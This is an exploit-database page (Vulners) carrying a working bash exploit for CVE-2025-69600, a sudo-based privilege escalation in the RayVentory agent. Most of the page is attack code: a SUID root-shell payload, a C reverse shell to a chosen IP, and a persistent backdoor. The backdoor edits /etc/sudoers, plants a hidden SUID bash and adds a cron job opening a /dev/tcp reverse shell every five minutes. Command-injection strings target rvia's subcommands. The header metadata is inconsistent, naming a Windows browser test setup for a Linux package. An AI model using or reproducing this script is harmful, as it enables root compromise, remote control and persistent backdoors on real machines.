Vulners
Lucene search
📄 Raynet rvia 12.6.4392.49-amd64.deb Privilege Escalation
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
 | Exploit for CVE-2025-69600 | 11 Feb 202612:02 | – | githubexploit |
 | CVE-2025-69600 | 27 May 202600:00 | – | attackerkb |
 | RayVentory Scan Engine 安全漏洞 | 27 May 202600:00 | – | cnnvd |
 | CVE-2025-69600 | 27 May 202600:00 | – | cve |
 | CVE-2025-69600 | 27 May 202600:00 | – | cvelist |
 | CVE-2025-69600 | 27 May 202618:16 | – | nvd |
 | PT-2026-44047 | 27 May 202600:00 | – | ptsecurity |
 | CVE-2025-69600 | 28 May 202620:12 | – | redhatcve |
 | CVE-2025-69600 | 27 May 202600:00 | – | vulnrichment |
=============================================================================================================================================
| # Title : Raynet rvia 2.6.4392.49-amd64.deb Privilege Escalation Vulnerability |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits) |
| # Vendor : https://raynet.de/ |
=============================================================================================================================================
[+] Summary : A privilege escalation vulnerability identified as CVE-2025-69600 affects certain versions of RayVentory Inventory Agent.
The issue arises from improper validation and insufficient restriction of privileged operations when executed through sudo configurations.
Under specific misconfigurations, a local authenticated user may be able to execute unintended commands with elevated privileges.
Successful exploitation could lead to full system compromise, including unauthorized modification of system files and persistence mechanisms.
Organizations using affected versions should review sudo configurations, restrict command execution scopes, and upgrade to a patched version as recommended by the vendor
[+] POC :
#!/bin/bash
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
NC='\033[0m'
VULNERABLE_VERSION="12.6.4392.49"
TARGET_DIR="/tmp"
PAYLOAD_NAME="rootme_$$" # Added PID to avoid conflict
BACKUP_DIR="/tmp/.rvia_backup_$$"
LISTENER_PORT="4444"
CVE_NUMBER="CVE-2025-69600"
REVERSE_IP=""
REVERSE_PORT="4444"
LISTENER_PID=""
CLEANUP_NEEDED=false
EXPLOIT_SUCCESS=false
show_help() {
cat << EOF
Exploit for $CVE_NUMBER - RayVentory Inventory Agent
Optimized Version 3.0
Usage: $0 [options]
Options:
-c, --check Only check for vulnerability
-e, --exploit Attempt local exploitation
-r, --reverse IP Reverse Shell (Example: -r 192.168.1.100)
-p, --port PORT Port (Default: 4444)
-b, --backdoor IP Install persistent backdoor
-h, --help Show help
Examples:
$0 -c
$0 -e
$0 -r 192.168.1.100 -p 5555
$0 -b 192.168.1.100
EOF
exit 0
}
cleanup() {
if [ "$CLEANUP_NEEDED" = true ]; then
echo -e "\n${YELLOW}[*] Cleaning up temporary files...${NC}"
rm -f "/tmp/$PAYLOAD_NAME" 2>/dev/null
rm -f "/tmp/$PAYLOAD_NAME.c" 2>/dev/null
rm -f "/tmp/malicious_$$.cfg" 2>/dev/null
if [ -d "/tmp/bin_$$" ]; then
rm -rf "/tmp/bin_$$" 2>/dev/null
fi
if [ -f "$BACKUP_DIR/rvia.cfg" ]; then
if [ -f "/opt/rvia/rvia.cfg" ]; then
cp "$BACKUP_DIR/rvia.cfg" "/opt/rvia/rvia.cfg" 2>/dev/null
fi
rm -rf "$BACKUP_DIR" 2>/dev/null
echo -e "${GREEN}[OK] Configuration file restored${NC}"
fi
if [ -n "$LISTENER_PID" ] && kill -0 "$LISTENER_PID" 2>/dev/null; then
kill "$LISTENER_PID" 2>/dev/null
sleep 1
kill -9 "$LISTENER_PID" 2>/dev/null
fi
echo -e "${GREEN}[OK] Cleanup complete${NC}"
fi
exit 0
}
trap cleanup SIGINT SIGTERM EXIT
create_payload() {
local payload_type=$1
local payload_path="/tmp/${PAYLOAD_NAME}.c"
local gcc_output
echo -e "${BLUE}[*] Creating payload: $payload_type${NC}"
case $payload_type in
"suid")
cat > "$payload_path" << 'EOF'
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main() {
if (setuid(0) != 0) {
return 1;
}
if (setgid(0) != 0) {
return 1;
}
execl("/bin/bash", "bash", "-p", NULL);
return 0;
}
EOF
;;
"reverse")
if [ -z "$REVERSE_IP" ]; then
echo -e "${RED}[!] Reverse shell IP not specified${NC}"
return 1
fi
cat > "$payload_path" << EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <fcntl.h>
int main() {
int sock;
struct sockaddr_in server;
sock = socket(AF_INET, SOCK_STREAM, 0);
if (sock < 0) return 1;
server.sin_family = AF_INET;
server.sin_port = htons($REVERSE_PORT);
server.sin_addr.s_addr = inet_addr("$REVERSE_IP");
if (connect(sock, (struct sockaddr *)&server, sizeof(server)) < 0) {
close(sock);
return 1;
}
dup2(sock, 0);
dup2(sock, 1);
dup2(sock, 2);
execl("/bin/bash", "bash", NULL);
return 0;
}
EOF
;;
"backdoor")
if [ -z "$REVERSE_IP" ]; then
echo -e "${RED}[!] Backdoor IP not specified${NC}"
return 1
fi
cat > "$payload_path" << EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <time.h>
int main() {
while(1) {
if (getuid() == 0) {
FILE *fp;
fp = fopen("/etc/sudoers", "a");
if (fp) {
fprintf(fp, "\\nroot ALL=(ALL:ALL) NOPASSWD:ALL\\n");
fclose(fp);
}
system("cp /bin/bash /tmp/.hidden_bash && chmod 4755 /tmp/.hidden_bash");
system("echo '*/5 * * * * root /tmp/.hidden_bash -c \"bash -i >& /dev/tcp/$REVERSE_IP/$REVERSE_PORT 0>&1\"' >> /etc/crontab");
break;
}
sleep(5);
}
return 0;
}
EOF
;;
*)
echo -e "${RED}[!] Unknown payload type: $payload_type${NC}"
return 1
;;
esac
if ! command -v gcc &> /dev/null; then
echo -e "${RED}[!] gcc is not installed${NC}"
return 1
fi
gcc_output=$(gcc -Wall "$payload_path" -o "/tmp/$PAYLOAD_NAME" 2>&1)
if [ $? -ne 0 ]; then
echo -e "${RED}[!] Failed to compile payload${NC}"
echo -e "${RED}$gcc_output${NC}"
return 1
fi
chmod +x "/tmp/$PAYLOAD_NAME"
echo -e "${GREEN}[OK] Payload created successfully: /tmp/$PAYLOAD_NAME${NC}"
CLEANUP_NEEDED=true
return 0
}
check_version() {
echo -e "${BLUE}[*] Checking RayVentory version...${NC}"
local version=""
local installed=false
if command -v dpkg &> /dev/null; then
version=$(dpkg -l 2>/dev/null | grep rvia | awk '{print $3}')
if [ -n "$version" ]; then
installed=true
fi
fi
if [ "$installed" = false ] && [ -f "/opt/rvia/rvia" ]; then
version=$(/opt/rvia/rvia --version 2>/dev/null | head -n1 | grep -oE '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+')
if [ -n "$version" ]; then
installed=true
fi
fi
if [ "$installed" = false ]; then
echo -e "${RED}[!] RayVentory is not installed on the system${NC}"
return 1
fi
echo -e "${GREEN}[OK] Installed version: $version${NC}"
if command -v dpkg &> /dev/null; then
if dpkg --compare-versions "$version" le "$VULNERABLE_VERSION" 2>/dev/null; then
echo -e "${GREEN}[OK] System is vulnerable to $CVE_NUMBER${NC}"
return 0
else
echo -e "${RED}[!] Version $version is newer than the known vulnerable version${NC}"
echo -e "${YELLOW}[!] System might not be vulnerable${NC}"
return 1
fi
else
echo -e "${YELLOW}[!] Cannot accurately verify vulnerability status${NC}"
echo -e "${YELLOW}[!] Proceeding with exploitation attempt at your own risk${NC}"
return 0
fi
}
check_sudo() {
echo -e "${BLUE}[*] Checking sudo privileges...${NC}"
if ! command -v sudo &> /dev/null; then
echo -e "${RED}[!] sudo is not installed${NC}"
return 1
fi
if ! sudo -n true 2>/dev/null; then
echo -e "${YELLOW}[!] sudo may require a password${NC}"
echo -e "${YELLOW}[*] Please enter password if prompted${NC}"
fi
local sudo_config=$(sudo -l 2>&1)
if echo "$sudo_config" | grep -q "sorry, a password is required"; then
echo -e "${RED}[!] sudo password required but not provided${NC}"
return 1
fi
if ! echo "$sudo_config" | grep -q "rvia"; then
echo -e "${RED}[!] No sudo privileges found for rvia${NC}"
return 1
fi
echo -e "${GREEN}[OK] sudo privileges exist${NC}"
local patterns=(
"rvia[[:space:]]*\*"
"rvia[[:space:]]+getconfig"
"rvia[[:space:]]+upload"
"rvia[[:space:]]+inventory"
"rvia[[:space:]]+oracle"
"(root)[[:space:]]*"
"(ALL[[:space:]]*:[[:space:]]*ALL)"
"(ALL)[[:space:]]*"
)
local found=0
for pattern in "${patterns[@]}"; do
if echo "$sudo_config" | grep -qE "$pattern"; then
found=1
echo -e "${GREEN}[OK] Found exploitable pattern: $pattern${NC}"
break
fi
done
if [ $found -eq 1 ]; then
echo -e "${GREEN}[OK] Configuration is exploitable!${NC}"
return 0
else
echo -e "${YELLOW}[!] Configuration may not be directly exploitable${NC}"
return 0
fi
}
exploit_single_method() {
local method=$1
local cmd="/tmp/$PAYLOAD_NAME"
local temp_cfg="/tmp/malicious_$$.cfg"
echo -e "${BLUE}[*] Attempting exploit using: $method${NC}"
if [ ! -d "$BACKUP_DIR" ] && [ -f "/opt/rvia/rvia.cfg" ]; then
mkdir -p "$BACKUP_DIR"
cp "/opt/rvia/rvia.cfg" "$BACKUP_DIR/" 2>/dev/null
fi
case $method in
"getconfig")
sudo /opt/rvia/rvia getconfig \";$cmd;\" 2>/dev/null
;;
"upload")
mkdir -p "/opt/rvia/results" 2>/dev/null
touch "/opt/rvia/results/test_$$.xml" 2>/dev/null
sudo /opt/rvia/rvia upload \"\;$cmd\;#\" 2>/dev/null
;;
"inventory")
sudo /opt/rvia/rvia inventory \";$cmd;\" 2>/dev/null
;;
"oracle")
local bin_dir="/tmp/bin_$$"
mkdir -p "$bin_dir" 2>/dev/null
ln -sf "/tmp/$PAYLOAD_NAME" "$bin_dir/java" 2>/dev/null
cat > "$temp_cfg" << EOF
javaPaths=$bin_dir/
EOF
cp "$temp_cfg" "/opt/rvia/rvia.cfg" 2>/dev/null
sudo /opt/rvia/rvia oracle test 2>/dev/null
;;
"config")
cat > "$temp_cfg" << EOF
configDownloadSource=http://127.0.0.1:$LISTENER_PORT/malicious
schedule:command:$cmd * * * * *
EOF
cp "$temp_cfg" "/opt/rvia/rvia.cfg" 2>/dev/null
(
timeout 5 nc -l -p "$LISTENER_PORT" -q 1 2>/dev/null << EOF
HTTP/1.1 200 OK
Content-Type: text/plain
malicious
EOF
) &
LISTENER_PID=$!
sleep 2
sudo /opt/rvia/rvia getconfig 2>/dev/null
;;
esac
sleep 3
}
check_success() {
local payload="/tmp/$PAYLOAD_NAME"
if [ ! -f "$payload" ]; then
return 1
fi
if [ -u "$payload" ]; then
echo -e "${GREEN}[OK] Privilege escalation successful!${NC}"
echo -e "${GREEN}[OK] Launching root shell...${NC}"
EXPLOIT_SUCCESS=true
"$payload"
return 0
fi
if command -v stat &> /dev/null; then
local perms=$(stat -c "%A" "$payload" 2>/dev/null)
if [[ $perms == *s* ]]; then
echo -e "${GREEN}[OK] Privilege escalation successful (stat)!${NC}"
EXPLOIT_SUCCESS=true
"$payload"
return 0
fi
fi
return 1
}
try_all_methods() {
local methods=("getconfig" "upload" "inventory" "oracle" "config")
local success=1
for method in "${methods[@]}"; do
exploit_single_method "$method"
if check_success; then
success=0
break
fi
# Restore configuration file after each failed attempt
if [ -f "$BACKUP_DIR/rvia.cfg" ]; then
cp "$BACKUP_DIR/rvia.cfg" "/opt/rvia/rvia.cfg" 2>/dev/null
fi
done
return $success
}
install_backdoor() {
echo -e "${BLUE}[*] Installing persistent backdoor...${NC}"
if [ -z "$REVERSE_IP" ]; then
echo -e "${RED}[!] Backdoor IP must be specified${NC}"
return 1
fi
if create_payload "backdoor"; then
if try_all_methods; then
echo -e "${GREEN}[OK] Backdoor installed successfully${NC}"
echo -e "${YELLOW}[*] Reverse shell to $REVERSE_IP:$REVERSE_PORT every 5 minutes${NC}"
return 0
else
echo -e "${RED}[!] Failed to install backdoor${NC}"
return 1
fi
fi
}
main() {
local CHECK_ONLY=false
local EXPLOIT=false
local BACKDOOR=false
local REVERSE=false
while [[ $# -gt 0 ]]; do
case $1 in
-c|--check)
CHECK_ONLY=true
shift
;;
-e|--exploit)
EXPLOIT=true
shift
;;
-r|--reverse)
REVERSE=true
if [ -z "$2" ] || [[ "$2" =~ ^- ]]; then
echo -e "${RED}[!] IP required for reverse shell${NC}"
exit 1
fi
REVERSE_IP="$2"
shift 2
;;
-p|--port)
if [ -z "$2" ] || [[ "$2" =~ ^- ]]; then
echo -e "${RED}[!] Port number required${NC}"
exit 1
fi
if ! [[ "$2" =~ ^[0-9]+$ ]] || [ "$2" -lt 1 ] || [ "$2" -gt 65535 ]; then
echo -e "${RED}[!] Invalid port: $2${NC}"
exit 1
fi
REVERSE_PORT="$2"
shift 2
;;
-b|--backdoor)
BACKDOOR=true
if [ -z "$2" ] || [[ "$2" =~ ^- ]]; then
echo -e "${RED}[!] IP required for backdoor${NC}"
exit 1
fi
REVERSE_IP="$2"
shift 2
;;
-h|--help)
show_help
;;
*)
echo -e "${RED}Unknown option: $1${NC}"
show_help
;;
esac
done
if [ ! -f "/opt/rvia/rvia" ]; then
echo -e "${RED}[!] RayVentory is not installed at /opt/rvia/rvia${NC}"
exit 1
fi
if [ "$CHECK_ONLY" = true ]; then
check_version && check_sudo
exit $?
fi
if [ "$BACKDOOR" = true ]; then
check_version && check_sudo && install_backdoor
exit $?
fi
if [ "$REVERSE" = true ]; then
check_version && check_sudo && create_payload "reverse" && try_all_methods
if [ $? -eq 0 ] && [ "$EXPLOIT_SUCCESS" = false ]; then
echo -e "${RED}[!] Exploit failed${NC}"
exit 1
fi
exit 0
fi
if [ "$EXPLOIT" = true ]; then
check_version && check_sudo && create_payload "suid" && try_all_methods
if [ $? -eq 0 ] && [ "$EXPLOIT_SUCCESS" = false ]; then
echo -e "${RED}[!] Exploit failed${NC}"
exit 1
fi
exit 0
fi
show_help
}
main "$@"
Greetings to :======================================================================
jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|
====================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
19 Feb 2026 00:00Current
5.5Medium risk
Vulners AI Score5.5
EPSS0.00074